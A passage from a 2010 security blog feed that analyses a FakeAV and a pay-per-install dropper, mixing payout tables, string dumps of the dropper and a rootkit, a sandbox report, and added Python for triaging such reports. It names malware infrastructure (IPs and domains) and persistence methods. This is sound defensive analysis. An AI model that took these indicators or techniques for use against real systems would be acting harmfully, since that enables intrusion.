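# Meaning of a service key's Start value (SERVICE_BOOT_START .. SERVICE_DISABLED).
SERVICE_START = {0: "boot", 1: "system", 2: "automatic", 3: "manual", 4: "disabled"}

LINE_RE = re.compile(r"^(?P<kind>[^:]+): (?P<detail>.*)$")
SERVICE_RE = re.compile(r"\\Services\\(?P<svc>[^\\]+)\\Start = (?P<val>[0-9A-Fa-f]{8})$")
RUN_RE = re.compile(r"\\CurrentVersion\\Run\\(?P<name>[^=]+?) = (?P<cmd>.*)$", re.IGNORECASE)
CONN_RE = re.compile(r'Connects to "(?P<ip>[\d.]+)" on port (?P<port>\d+)')


def decode_reg_dword(hexdata):
    """The sandbox prints REG_DWORD data as raw little-endian bytes: 04000000 is the value 4."""
    return int.from_bytes(bytes.fromhex(hexdata), "little")


def triage(report):
    """Turn the report's 'Kind: detail' lines into a dict of indicators."""
    ind = {"dropped": [], "run_keys": {}, "services": {}, "connections": [], "domains": []}
    for line in report.strip().splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        kind, detail = m.group("kind"), m.group("detail")
        if kind == "Defined file type created" and detail.lower().endswith((".exe", ".dll")):
            ind["dropped"].append(detail)
        elif kind.startswith("Defined registry AutoStart"):
            s = SERVICE_RE.search(detail)
            if s:
                start = decode_reg_dword(s.group("val"))
                ind["services"][s.group("svc")] = SERVICE_START.get(start, str(start))
                continue
            r = RUN_RE.search(detail)
            if r:
                ind["run_keys"][r.group("name")] = r.group("cmd")
        elif kind == "Internet connection":
            c = CONN_RE.search(detail)
            if c:
                ind["connections"].append((c.group("ip"), int(c.group("port"))))
        elif kind == "Query DNS":
            # The post defangs names with a space before the TLD; strip it.
            ind["domains"].append(re.sub(r"\s+", "", detail))
    return ind


def findings(ind):
    """Human-readable flags; the wording and the %TEMP% heuristic are the editor's own."""
    out = []
    for svc, mode in ind["services"].items():
        if mode == "disabled":
            note = " (Windows Update)" if svc == "wuauserv" else ""
            out.append(f"service {svc} set to disabled{note}")
    if ind["run_keys"]:
        out.append(f"{len(ind['run_keys'])} Run-key autostart entries")
    temp = [p for p in ind["dropped"] if "\\Local Settings\\Temp\\" in p]
    if temp:
        out.append(f"{len(temp)} executables dropped in %TEMP%")
    for ip, port in ind["connections"]:
        out.append(f"HTTP to raw IP {ip}:{port}")
    return out


if __name__ == "__main__":
    for f in findings(triage(REPORT)):
        print(f)
```

<p>Disabling wuauserv is the kind of change a FakeAV relies on to keep the host from receiving signature and platform updates, and it is cheap to check on any suspect machine by reading the same Start value back from the registry.</p>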

<p>This FakeAV also makes an interesting modification to the Windows Task Manager, which to the average user would probably be quite convincing.</p>
<p><a href="http://i53.tinypic.com/20t5ncz.png" target="_blank"><img src="http://i53.tinypic.com/20t5ncz.png" border="0" alt="AntiVirus Studio 2010 TaskMan Mod" /></a></p>
<p>It also shows fake Windows Security Center notifications.</p>
<p><a href="http://i53.tinypic.com/2mp0co0.png" target="_blank"><img src="http://i53.tinypic.com/2mp0co0.png" border="0" alt="AntiVirus Studio 2010 Security Center Fake" /></a></p>
<p><a href="http://i56.tinypic.com/33cu90i.png" target="_blank"><img src="http://i56.tinypic.com/33cu90i.png" border="0" alt="AntiVirus Studio 2010 Security Center Firewall Fake" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.novirusthanks.org/2010/10/fakeav-antivirus-studio-2010/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Pay-Per-Install Analysis &#8211; Part Four</title>
		<link>http://blog.novirusthanks.org/2010/07/pay-per-install-analysis-part-four/</link>
		<comments>http://blog.novirusthanks.org/2010/07/pay-per-install-analysis-part-four/#comments</comments>
		<pubDate>Mon, 26 Jul 2010 14:38:43 +0000</pubDate>
		<dc:creator></dc:creator>
				<category><![CDATA[Malware Analysis]]></category>

		<guid isPermaLink="false">http://blog.novirusthanks.org/?p=2897</guid>
		<description><![CDATA[GoldInstall &#160; Next we have a company called GoldInstall. &#160; &#160; This is how much they pay for 1000 installs per country. &#160; Country Price OTH 13$ US 150$ GB 110$ CA 110$ DE 30$ BE 20$ IT 65$ CH 20$ CZ 20$ DK 20$ ES 30$ AU 55$ FR 30$ NL 20$ NO 20$ [...]]]></description>
			<content:encoded><![CDATA[<p><strong><u>GoldInstall</u></strong></p>
<p>&nbsp;</p>
<p>Next we have a company called GoldInstall.</p>
<p>&nbsp;</p>
<p><a href="http://i32.tinypic.com/2ivohzl.png"><img src="http://i32.tinypic.com/2ivohzl.png" alt="Image" width="530" height="250" /></a></p>
<p>&nbsp;</p>
<p>This is how much they pay for 1000 installs per country.</p>
<p>&nbsp;</p>
<pre>Country  	Price
OTH 	13$
US 	150$
GB 	110$
CA 	110$
DE 	30$
BE 	20$
IT 	65$
CH 	20$
CZ 	20$
DK 	20$
ES 	30$
AU 	55$
FR 	30$
NL 	20$
NO 	20$
PT 	30$
LB 	6$
AL 	6$
LA 	6$
AF 	6$
KZ 	6$
AE 	6$
LU 	6$
AZ 	6$
BD 	6$
BH 	6$
MN 	6$
MO 	6$
BN 	6$
MV 	6$
BT 	6$
MY 	6$
NP 	6$
CN 	6$
OM 	6$
PH 	6$
PK 	6$
CY 	6$
QA 	6$
SA 	6$
SG 	6$
SY 	6$
TW 	6$
TH 	6$
FJ 	6$
TM 	6$
HK 	6$
ID 	6$
IL 	6$
IN 	6$
UZ 	6$
IQ 	6$
IR 	6$
VN 	6$
YE 	6$
JO 	6$
JP 	6$
KH 	6$
KP 	6$
KR 	6$
KW 	6$</pre>
<p>&nbsp;</p>
<p>One thing I found quite funny was these two entries in their FAQ.</p>
<p>&nbsp;</p>
<blockquote><p><strong>Is your software a virus?</strong></p>
<p>&nbsp;</p>
<p>Definitely not! We don&#8217;t do anything against the computer owner. If they choose to use a Goldinstall-supported service, it is identical to accepting the mechanisms we bring (such as popup advertisements). It&#8217;s just as simple as that.</p>
<p>&nbsp;</p>
<p><strong>So why does my antivirus classify you as trojan/worm/virus?</strong></p>
<p>&nbsp;</p>
<p>AV companies have a good interest in convincing you that the Internet is an insecure place full of danger, and that almost nothing is worthy of any trust (unless you use their products). We don&#8217;t share such views.</p></blockquote>
<p>&nbsp;</p>
<p>So let me get this right. AVs are wrong to detect an application that silently downloads and executes other malware? One of those, in my tests, was a rootkit, which incidentally had &#8220;botnet&#8221; in its internal PDB path.</p>
<p>&nbsp;</p>
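<p>Before reading a strings dump like the one below, it helps to know what the columns say. The second column is a byte length, so an entry whose length is twice its character count (USER32.DLL at 0x14, CreateShortcut at 0x1C, the *\A...vbp path at 0x4A) was stored as UTF-16, and VB6 binaries carry the build machine's .vbp project path behind a *\A marker, which is a handy key for clustering droppers built from the same affiliate kit. The following Python is an added example, not code from the original post: it parses a subset of the entries copied from the dump, infers each string's encoding from the length column, extracts the project path, and groups the imports and COM member names into capability buckets whose labels are the editor's own. Treating the SAFE_-prefixed blobs as encoded configuration is an assumption, suggested only by the Decryption and SConfig names in the same dump.</p>

```python
import re

# Entries copied from the strings dump of the AutoDownload dropper
# (a small subset; offsets and lengths are as the strings tool printed them).
STRINGS_DUMP = r"""
0x000022B8  0x0000004A  *\AS:\Worker\tempvbp\AutoDownload.vbp
0x00004794  0x00000014  USER32.DLL
0x000047F0  0x00000016  WININET.DLL
0x00004A74  0x0000000D  InternetOpenA
0x00004B6C  0x00000010  InternetOpenUrlA
0x00004C10  0x00000010  InternetReadFile
0x00004E4C  0x0000000D  RegCreateKeyA
0x00004E94  0x0000000E  RegSetValueExA
0x00004FB4  0x00000010  SHGetFolderPathA
0x00005194  0x0000000A  WSAStartup
0x00005A10  0x00000006  sendto
0x0000638C  0x0000001C  CreateShortcut
0x00006434  0x00000012  ExecQuery
0x0001B39C  0x00000025  SAFE_rGX8EhiOOnz7qnE0cOpCKcNDUhe57Sli
"""

ENTRY_RE = re.compile(r"^\s*(0x[0-9A-Fa-f]+)\s+(0x[0-9A-Fa-f]+)\s+(.*?)\s*$")

# Editor's own grouping of the imports and COM member names seen in the dump.
CAPABILITIES = {
    "http download (WinInet)": {"InternetOpenA", "InternetOpenUrlA", "InternetReadFile", "HttpQueryInfoA"},
    "registry write (persistence candidate)": {"RegCreateKeyA", "RegSetValueExA"},
    "locate profile folders": {"SHGetFolderPathA"},
    "raw sockets (Winsock)": {"WSAStartup", "connect", "sendto", "recvfrom"},
    "shortcut creation (WScript.Shell)": {"CreateShortcut", "TargetPath", "WorkingDirectory"},
    "WMI query (host fingerprinting)": {"ExecQuery", "MACAddress"},
}


def parse_strings(dump):
    """Parse 'offset length text' lines. The length column is in bytes, so a
    printable string whose byte length is twice its character count was UTF-16."""
    entries = []
    for line in dump.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue
        offset, length, text = int(m.group(1), 16), int(m.group(2), 16), m.group(3)
        if length == len(text):
            enc = "ansi"
        elif length == 2 * len(text):
            enc = "utf-16"
        else:
            enc = "unknown"  # whitespace lost by the tool, or a truncated/partial string
        entries.append({"offset": offset, "length": length, "text": text, "encoding": enc})
    return entries


def vb6_project_path(entries):
    """VB6 binaries embed the build machine's .vbp path as a UTF-16 string
    introduced by the marker '*\\A'; return the path without the marker."""
    for e in entries:
        if e["text"].startswith("*\\A") and e["text"].lower().endswith(".vbp"):
            return e["text"][3:]
    return None


def capabilities(entries):
    """Map the names present in the dump onto the capability buckets above."""
    names = {e["text"] for e in entries}
    return {cap: sorted(names.intersection(apis))
            for cap, apis in CAPABILITIES.items() if names.intersection(apis)}


def blobs(entries, prefix="SAFE_"):
    """Fixed-width 'SAFE_' strings; assumed (not proven here) to be encoded
    configuration, given the Decryption and SConfig names in the same dump."""
    return [e["text"] for e in entries if e["text"].startswith(prefix)]


if __name__ == "__main__":
    es = parse_strings(STRINGS_DUMP)
    print("project:", vb6_project_path(es))
    for cap, apis in capabilities(es).items():
        print(cap + ":", ", ".join(apis))
    print("blobs:", len(blobs(es)))
```

<p>The encoding inference matters when writing detection: a YARA or grep pattern for a UTF-16 string such as the project path must be declared wide, or it will never match the binary even though the dump shows it in plain text.</p>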
<p>List of strings from the dropper, which was only packed with UPX and was compiled with Visual Basic 6.0.</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">0x000001B0	0x00000005	.text
0x000001D7	0x00000006	`.data
0x00000200	0x00000005	.rsrc
0x0000127C	0x0000000C	AutoDownload
0x0000128D	0x00000007	  =   3
0x000012D4	0x0000000E	lientWidSocket
0x00001368	0x00000005	Form1
0x00001372	0x00000005	Form1
0x00001589	0x0000000A	DDDDDDDDD@
0x0000168B	0x00000005	Form1
0x000016AD	0x00000006	Timer3
0x000016CE	0x00000008	dpsocket
0x000016DA	0x00000013	AutoDownload.Socket
0x00001752	0x00000005	Text1
0x00001773	0x00000006	Timer2
0x00001795	0x0000000B	WebBrowser1
0x000017A4	0x00000015	SHDocVwCtl.WebBrowser
0x00001874	0x00000006	Timer1
0x00001896	0x0000000A	vb6chs.dll
0x00001911	0x0000000C	AutoDownload
0x000022B8	0x0000004A	*\AS:\Worker\tempvbp\AutoDownload.vbp
0x000025C9	0x00000013	AutoDownload.Socket
0x000025DD	0x00000006	Socket
0x00002760	0x0000000A	ReadyState
0x0000276B	0x0000000B	shdocvw.dll
0x00002777	0x00000015	SHDocVwCtl.WebBrowser
0x0000278D	0x0000000A	WebBrowser
0x00004700	0x00000009	moduleAPI
0x0000470C	0x0000000E	moduleRegister
0x0000471C	0x0000000D	moduleWinInet
0x0000472C	0x00000005	Form1
0x00004734	0x00000013	classApplicationLog
0x00004748	0x00000007	Module1
0x00004750	0x00000007	Module2
0x00004758	0x0000000F	modSocketMaster
0x00004768	0x0000000D	CSocketMaster
0x00004778	0x00000006	Socket
0x00004780	0x0000000C	AutoDownload
0x00004794	0x00000014	USER32.DLL
0x000047B0	0x00000018	KERNEL32.DLL
0x000047D0	0x00000018	ADVAPI32.DLL
0x000047F0	0x00000016	WININET.DLL
0x0000482C	0x00000008	kernel32
0x0000483C	0x0000000C	GetLastError
0x0000484C	0x0000000B	WebBrowser1
0x00004890	0x0000000C	LoadLibraryA
0x000048D8	0x0000000E	GetProcAddress
0x00004920	0x00000006	user32
0x0000492C	0x0000000F	CallWindowProcA
0x00004974	0x0000000B	FreeLibrary
0x000049B8	0x0000000D	RtlMoveMemory
0x00004A18	0x00000006	Timer3
0x00004A64	0x00000008	VBA6.DLL
0x00004A74	0x0000000D	InternetOpenA
0x00004AB0	0x0000001A	RegOpenKeyExA
0x00004AD0	0x00000007	wininet
0x00004B20	0x00000013	InternetCloseHandle
0x00004B6C	0x00000010	InternetOpenUrlA
0x00004BB8	0x0000000B	wininet.dll
0x00004BC8	0x0000000E	HttpQueryInfoA
0x00004C10	0x00000010	InternetReadFile
0x00004C5C	0x00000012	InternetSetOptionA
0x00004D1C	0x00000035	C:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
0x00004D8C	0x00000005	Text1
0x00004DB4	0x0000001F	C:\WINDOWS\system32\shdocvw.oca
0x00004DD4	0x0000000A	SHDocVwCtl
0x00004E18	0x00000009	udpsocket
0x00004E24	0x00000006	Timer1
0x00004E2C	0x00000006	Timer2
0x00004E38	0x0000000C	advapi32.dll
0x00004E4C	0x0000000D	RegCreateKeyA
0x00004E94	0x0000000E	RegSetValueExA
0x00004EDC	0x0000000B	RegCloseKey
0x00004F20	0x0000000B	RegOpenKeyA
0x00004F64	0x00000005	Sleep
0x00004FA4	0x0000000B	shell32.dll
0x00004FB4	0x00000010	SHGetFolderPathA
0x00004FFC	0x0000000D	kjgfrtxdgqe63
0x00005014	0x00000007	udpstop
0x0000501C	0x0000000A	Decryption
0x00005028	0x00000007	GetItem
0x00005030	0x00000007	SetItem
0x00005038	0x0000000C	SaveFileText
0x00005048	0x0000000C	ReadFileText
0x00005058	0x0000000E	IsWowInstalled
0x00005068	0x0000000C	firstfucktag
0x00005078	0x00000007	SConfig
0x000050E4	0x0000000B	GlobalAlloc
0x000050F0	0x0000000C	SocketHandle
0x00005100	0x00000007	connect
0x00005140	0x0000000A	GlobalFree
0x00005184	0x0000000A	ws2_32.dll
0x00005194	0x0000000A	WSAStartup
0x000051D8	0x0000000A	WSACleanup
0x0000521C	0x00000015	WSAAsyncGetHostByName
0x0000526C	0x0000000E	WSAAsyncSelect
0x000052B4	0x0000000F	CreateWindowExA
0x000052C4	0x00000008	CloseSck
0x00005308	0x0000000D	DestroyWindow
0x00005350	0x00000008	lstrlenA
0x00005394	0x00000008	lstrcpyA
0x000053D8	0x00000008	SetTimer
0x0000541C	0x00000009	KillTimer
0x00005460	0x00000008	IsWindow
0x0000547C	0x0000000D	BytesReceived
0x000054CC	0x0000000E	GetWindowLongA
0x00005514	0x0000000E	SetWindowLongA
0x0000555C	0x00000010	GetModuleHandleA
0x00005640	0x00000005	Class
0x00005648	0x00000008	Protocol
0x00005654	0x00000022	C:\WINDOWS\system32\msvbvm60.dll\3
0x00005678	0x00000005	VBRUN
0x000056AC	0x00000006	socket
0x000056EC	0x0000000A	GlobalLock
0x00005730	0x0000000C	GlobalUnlock
0x00005778	0x00000005	htons
0x000057B8	0x00000005	ntohs
0x000057F8	0x00000007	connect
0x00005844	0x0000000B	gethostname
0x00005888	0x0000000D	gethostbyname
0x00005910	0x0000000B	getsockname
0x00005954	0x0000000B	getpeername
0x00005998	0x00000009	inet_addr
0x00005A10	0x00000006	sendto
0x00005A50	0x0000000A	getsockopt
0x00005A94	0x0000000A	setsockopt
0x00005B18	0x00000008	recvfrom
0x00005B5C	0x00000015	WSACancelAsyncRequest
0x00005B74	0x00000005	State
0x00005B7C	0x0000000D	LocalHostName
0x00005B8C	0x00000007	LocalIP
0x00005BD0	0x00000006	listen
0x00005C10	0x00000006	accept
0x00005C50	0x00000009	inet_ntoa
0x00005C94	0x0000000B	ioctlsocket
0x00005CD8	0x0000000B	closesocket
0x00005D18	0x00000007	WndProc
0x00005D20	0x0000000A	RemotePort
0x00005D2C	0x0000000A	RemoteHost
0x00005D38	0x0000000C	RemoteHostIP
0x00005D48	0x00000009	LocalPort
0x00005D58	0x00000008	SendData
0x00005D64	0x00000007	GetData
0x00005D6C	0x00000008	PeekData
0x00005D78	0x00000006	Listen
0x00005D80	0x00000006	Accept
0x00005D88	0x00000011	ConnectionRequest
0x00005D9C	0x0000000B	DataArrival
0x00005DA8	0x00000005	Error
0x00005DB0	0x0000000C	SendComplete
0x00005DC0	0x0000000C	SendProgress
0x00005F00	0x0000000C	netapi32.dll
0x00005F18	0x00000007	Netbios
0x00005F58	0x0000000E	GetProcessHeap
0x00005FA0	0x00000009	HeapAlloc
0x00005FE4	0x00000008	HeapFree
0x00006094	0x0000000D	GetVersionExA
0x00006100	0x0000000B	CreateFileA
0x00006144	0x0000000F	DeviceIoControl
0x0000618C	0x0000000B	CloseHandle
0x000061D0	0x00000015	GetVolumeInformationA
0x00006284	0x00000012	GetModuleFileNameA
0x000062D0	0x00000013	GetCurrentProcessId
0x00006320	0x00000008	FlushLog
0x00006358	0x00000015	cmSocket_SendProgress
0x0000638C	0x0000001C	CreateShortcut
0x000063AC	0x00000014	TargetPath
0x000063D8	0x00000020	WorkingDirectory
0x00006434	0x00000012	ExecQuery
0x00006448	0x00000014	MACAddress
0x000064B8	0x0000000C	EbMode
0x000064CC	0x0000001C	SetWindowLongA
0x000064F0	0x0000001E	CallWindowProcA
0x00006514	0x00000014	WSACleanup
0x00006530	0x00000012	KillTimer
0x00006568	0x0000000C	user32
0x0000657C	0x0000000C	ws2_32
0x0000658C	0x0000000E	cmSocket_Error
0x0000659C	0x00000015	cmSocket_SendComplete
0x00006628	0x0000000B	UserControl
0x00006634	0x00000008	cmSocket
0x00006640	0x00000011	cmSocket_CloseSck
0x00006654	0x00000010	cmSocket_Connect
0x00006668	0x0000001A	cmSocket_ConnectionRequest
0x00006684	0x00000014	cmSocket_DataArrival
0x000066A0	0x00000012	LocalPort
0x000066C8	0x00000010	Protocol
0x000066E0	0x00000014	RemoteHost
0x000066FC	0x00000014	RemotePort
0x00006784	0x00000006	Socket
0x0001B39C	0x00000025	SAFE_rGX8EhiOOnz7qnE0cOpCKcNDUhe57Sli
0x0001B3C4	0x00000025	SAFE_wXfFU0GiYdAvUQ86skySPaU80AmMHnmw
0x0001B3EC	0x00000025	SAFE_4fDBPXBwTcNF4WpeuDSuwqcW3psMwB0f
0x0001B414	0x00000025	SAFE_CU5ZIkuee8iXHaYeF0XH07I12WnVk4NM
0x0001B43C	0x00000025	SAFE_Ukw8ASw6d514KXPxkGUCxCJ89lOobEip
0x0001B464	0x00000006	iSplit
0x0001B46C	0x00000025	SAFE_TzIyaWLC083eHor12AAAXyzARroaoCl7
0x0001B494	0x00000025	SAFE_lF9XRDNe05MAKliKXQ75U40IY6PsfM6a
0x0001B4BC	0x00000025	SAFE_n5qnjCxOP7ZeVOOX2TLLvDCogYRVYSUI
0x0001B4E4	0x00000025	SAFE_Uj0uzUEwwlL7B4YJJgs45Rdz2oEQLD8U
0x0001B50C	0x00000025	SAFE_mzrUqCGPviedE1Pcoxpz2We782pjCNUw
0x0001B534	0x00000025	SAFE_X8QUuSJSJc12iEyzfDnXJgOweBRL5Bts
0x0001B55C	0x00000025	SAFE_8mGmoaasaLRD5fHYjqVi04xGvoTiqark
0x0001B590	0x00000025	SAFE_eTgd1MK7Yy2XtTCJ2xKTBn5ayGXzlGi9
0x0001B5B8	0x00000025	SAFE_wjXCs4MaYvL4wQ3cWDHO8t6i5V8HcQ3c
0x0001B5E0	0x00000025	SAFE_xaESA2wJxxZY73kp2GVdZ2HFDxAuVWSL
0x0001B608	0x00000025	SAFE_Fp521kylwus4A0b8WWSYV7IMKClDLhno
0x0001B630	0x00000025	SAFE_WYQHz1fvKVyxUS2HORFM9RioUYC8UsUi
0x0001B658	0x00000025	SAFE_p7w6cFENZMIBQFccDq7StOvuDjNVqpIL
0x0001B680	0x00000025	SAFE_xjzfjrRvFgBPyI9Ly7RSulUXFJRDsgm5
0x0001B6A8	0x00000025	SAFE_9S0STCtgN17H8PFHBODi0juoUEuZBReV
0x0001B6D0	0x00000025	SAFE_sYcsc0R6Dngoyzvsj9HSEAwZjIvmvX46
0x0001B6F8	0x00000025	SAFE_mOf9lycdfUgnHchmTmCVrEGKeNU0qLFx
0x0001B720	0x00000025	SAFE_fnIuiVsEdGGHBupQQDw8R6lV8rCKRlEH
0x0001B748	0x00000025	SAFE_T571D8NHgN0hn6pJqX9ssVAJPflUAka5
0x0001B770	0x00000025	SAFE_lLyb4qPjfKJEq4gcKn6npaBRVuMn1uvY
0x0001B798	0x00000025	SAFE_RdiVDGLIzkh9zIdkFamXWBxLKNsKF985
0x0001B7C0	0x00000025	SAFE_OX7ybJucwnBnYa0uh44S3EAdOoyyUW3F
0x0001B7E8	0x00000025	SAFE_POnEsHULLpOHjDh7D7JhUOMAWG0aNcSx
0x0001B810	0x00000025	SAFE_heeojzWnKmhomAYQhNGcQTNIdVbtEnnQ
0x0001B838	0x00000025	SAFE_mZH4O1J1aXfWesOSmxySseAFZeDEShAK
0x0001B860	0x00000025	SAFE_oQxKf0tkzZt0pV5gH0CiJnMmh6GrLnZ2
0x0001B888	0x00000025	SAFE_pGeaxyUTOa6Uz8mtm2QxkxYIqZJTEuxl
0x0001B8B0	0x00000025	SAFE_GqZAWhIKHz2Tu42yAKSO68W8O0uBp8PG
0x0001B8D8	0x00000009	requestID
0x0001B8E4	0x0000000A	bytesTotal
0x0001B8F0	0x00000006	Number
0x0001B8F8	0x0000000B	Description
0x0001B904	0x00000005	sCode
0x0001B90C	0x00000006	Source
0x0001B914	0x00000008	HelpFile
0x0001B920	0x0000000B	HelpContext
0x0001B92C	0x0000000D	CancelDisplay
0x0001B93C	0x00000009	bytesSent
0x0001B948	0x0000000E	bytesRemaining
0x0001B958	0x00000025	SAFE_YoiwczIxR2qYF6Prg6qac9HgIRnEY8PX
0x0001B994	0x0000003F	Returns/Sets the port to be connected to on the remote computer
0x0001B9D4	0x00000007	lngPort
0x0001B9DC	0x00000020	Returns/Sets the socket protocol
0x0001BA00	0x0000000B	enmProtocol
0x0001BA0C	0x0000003A	Returns/Sets the name used to identify the remote computer
0x0001BA48	0x00000007	strHost
0x0001BA50	0x00000022	Returns the remote host IP address
0x0001BA74	0x00000030	Returns/Sets the port used on the local computer
0x0001BAA8	0x0000002A	Returns the state of the socket connection
0x0001BAD4	0x0000001E	Returns the local machine name
0x0001BAF4	0x00000024	Returns the local machine IP address
0x0001BB1C	0x00000037	Returns the number of bytes received on this connection
0x0001BB54	0x00000019	Returns the socket handle
0x0001BB70	0x00000050	Returns or sets an expression that stores any extra data needed for your program
0x0001BBC4	0x00000006	strTag
0x0001BBCC	0x00000025	Accept an incoming connection request
0x0001BBF4	0x00000009	LocalPort
0x0001BC00	0x00000007	LocalIP
0x0001BC08	0x00000029	Binds socket to specific port and adapter
0x0001BC34	0x00000018	Close current connection
0x0001BC50	0x0000000A	RemoteHost
0x0001BC5C	0x0000000A	RemotePort
0x0001BC68	0x0000001E	Connect to the remote computer
0x0001BC90	0x00000007	varType
0x0001BC98	0x00000006	maxLen
0x0001BCA0	0x00000029	Retrieve data sent by the remote computer
0x0001BCCC	0x00000027	Listen for incoming connection requests
0x0001BCF4	0x00000039	Look at incoming data without removing it from the buffer
0x0001BD30	0x0000001C	Send data to remote computer
0x0001BD50	0x00000034	Occurs when a remote client is attempting to connect
0x0001BD8C	0x0000003B	Occurs when data has been received from the remote computer
0x0001BDC8	0x0000000E	Error occurred
0x0001BDD8	0x0000002B	Occurs after a send operation has completed
0x0001BE04	0x00000025	Occurs during process of sending data
0x000536A0	0x0000000C	MSVBVM60.DLL
0x000536B0	0x00000018	EVENT_SINK_GetIDsOfNames
0x000536CA	0x0000000E	MethCallEngine
0x000536DA	0x00000011	EVENT_SINK_Invoke
0x000536EE	0x00000012	Zombie_GetTypeInfo
0x00053702	0x00000011	EVENT_SINK_AddRef
0x00053716	0x0000000F	DllFunctionCall
0x00053728	0x00000017	Zombie_GetTypeInfoCount
0x00053742	0x00000012	EVENT_SINK_Release
0x00053756	0x00000019	EVENT_SINK_QueryInterface
0x00053772	0x00000012	__vbaExceptHandler
0x00053786	0x0000000E	ProcCallEngine
0x0005413E	0x0000000C	CONFIG
0x00054339	0x0000000A	DDDDDDDDD@
0x00054452	0x0000001E	VS_VERSION_INFO
0x000544AE	0x00000016	VarFileInfo
0x000544CE	0x00000016	Translation
0x000544F2	0x0000001C	StringFileInfo
0x00054516	0x00000010	080404B0
0x0005452E	0x00000016	CompanyName
0x00054552	0x00000016	ProductName
0x0005457A	0x00000016	FileVersion
0x000545A6	0x0000001C	ProductVersion
0x000545D6	0x00000018	InternalName
0x00054602	0x00000020	OriginalFilename
0x00054624	0x00000010	dick.exe</pre></td></tr></table></div>

<p>Sandbox report of the dropper.</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">Detailed report of suspicious malware actions:
&nbsp;
Created file on defined folder: C:\Documents and Settings\Administrator\Local Settings\Temp\~DFE274.tmp
Defined file type copied to Windows folder: C:\WINDOWS\system32\drivers\zgiejqbqy7.sys
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\geurge.exe
Defined registry AutoStart location added or modified: machine\software\microsoft\Windows\CurrentVersion\Run\ewrgetuj = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\geurge.exe
Defined registry AutoStart location added or modified: machine\system\CurrentControlSet\Services\zgiejqbqy7\DisplayName = zgiejqbqy7
Defined registry AutoStart location added or modified: machine\system\CurrentControlSet\Services\zgiejqbqy7\ImagePath = system32\drivers\zgiejqbqy7.sys
Defined registry AutoStart location added or modified: machine\system\CurrentControlSet\Services\zgiejqbqy7\Start = 01000000
Defined registry AutoStart location added or modified: machine\system\CurrentControlSet\Services\zgiejqbqy7\Type = 01000000
Internet connection: C:\Documents and Settings\Administrator\Local Settings\Temp\geurge.exe Connects to &quot;122.224.6.48&quot; on port 88 (TCP).
Internet connection: C:\Documents and Settings\Administrator\current\Local Settings\Temp\geurge.exe Connects to &quot;93.174.92.220&quot; on port 80 (TCP - HTTP).
Query DNS: config.perfectexe.com
Query DNS: ghucom.com
&nbsp;
Risk evaluation result: High</pre></td></tr></table></div>

<p>Strings from the rootkit driver I spoke of earlier.</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">0x00000377	0x00000006	h.text
0x0000039F	0x00000006	h.data
0x000003C8	0x00000006	.cdata
0x00000418	0x00000006	.reloc
0x00001EA9	0x00000005	8SVWh
0x000024AD	0x00000005	VVVVh
0x00002564	0x00000005	WWWWh
0x0000C0EC	0x0000001A	\Driver\NTICE
0x0000C108	0x00000016	\Driver\npf
0x0000C120	0x00000016	\SystemRoot
0x0000C142	0x00000006	.cdata
0x0000C14A	0x0000000A	hwldi
0x0000C156	0x0000000A	hwsht
0x0000C170	0x00000010	TransportAddress
0x0000C182	0x00000011	ConnectionContext
0x0000C19E	0x00000006	      
0x0000C1A6	0x0000000A	hwbcr
0x0000C39C	0x00000009	opera.exe
0x0000C3A8	0x0000000A	thebat.exe
0x0000C3B4	0x0000000F	thunderbird.exe
0x0000C3C4	0x00000009	msimn.exe
0x0000C3D0	0x0000000A	telnet.exe
0x0000C708	0x0000002D	e:\eclipse\botnet\drivers\Bin\i386\kernel.pdb
0x000103AE	0x00000008	hfisa@Pj
0x00010920	0x00000019	%08x %ws+0x%x (%08x:%08x)
0x0001093A	0x0000001D	%08x unknown+0x%x (%08x:%08x)
0x00010958	0x00000012	 (0x%08X--&gt;0x%08X)
0x00010978	0x0000000A	hwbcr
0x00010984	0x00000012	IofCompleteRequest
0x00010998	0x0000000D	IofCallDriver
0x00010A6E	0x0000001E	FILE: unknown+0x%x (%08x:%08x)
0x00010A94	0x0000000C	 (%08x:%08x)
0x00010AA2	0x00000005	+0x%x
0x00010AA8	0x00000009	FILE: %ws
0x00010ADA	0x00000025	BugCheck %X, {%08x, %08x, %08x, %08x}
0x00010B00	0x00000006	.cdata
0x00011610	0x0000000C	CreateModule
0x00011620	0x0000000C	DeleteModule
0x00012CF6	0x00000014	ObfDereferenceObject
0x00012D0E	0x00000017	ObReferenceObjectByName
0x00012D28	0x00000012	IoDriverObjectType
0x00012D3E	0x00000014	RtlInitUnicodeString
0x00012D57	0x00000014	xAllocatePoolWithTag
0x00012D6E	0x00000006	memset
0x00012D78	0x00000012	IofCompleteRequest
0x00012D8E	0x0000000C	PoCallDriver
0x00012D9E	0x00000013	PoStartNextPowerIrp
0x00012DB4	0x0000000E	IoDeleteDevice
0x00012DC6	0x0000001B	IoAttachDeviceToDeviceStack
0x00012DE4	0x0000000E	IoCreateDevice
0x00012DF6	0x00000012	ObfReferenceObject
0x00012E0C	0x00000018	IoGetRelatedDeviceObject
0x00012E28	0x00000019	ObReferenceObjectByHandle
0x00012E44	0x0000000C	IoCreateFile
0x00012E54	0x00000006	memcpy
0x00012E5E	0x0000000D	IofCallDriver
0x00012E6E	0x0000000E	IoAttachDevice
0x00012E80	0x00000009	_purecall
0x00012E8C	0x00000013	IoGetCurrentProcess
0x00012EA3	0x00000010	xFreePoolWithTag
0x00012EB6	0x00000008	_stricmp
0x00012EC2	0x00000012	KeGetCurrentThread
0x00012ED8	0x00000015	KeWaitForSingleObject
0x00012EF0	0x0000000D	IoAllocateIrp
0x00012F00	0x0000000C	KeClearEvent
0x00012F10	0x00000010	IoFileObjectType
0x00012F24	0x00000006	strcmp
0x00012F2E	0x00000007	strncat
0x00012F38	0x00000018	NtQuerySystemInformation
0x00012F54	0x00000007	ZwClose
0x00012F5E	0x00000018	KeServiceDescriptorTable
0x00012F7A	0x00000010	MmIsAddressValid
0x00012F8E	0x00000007	sprintf
0x00012F98	0x0000000C	KeBugCheckEx
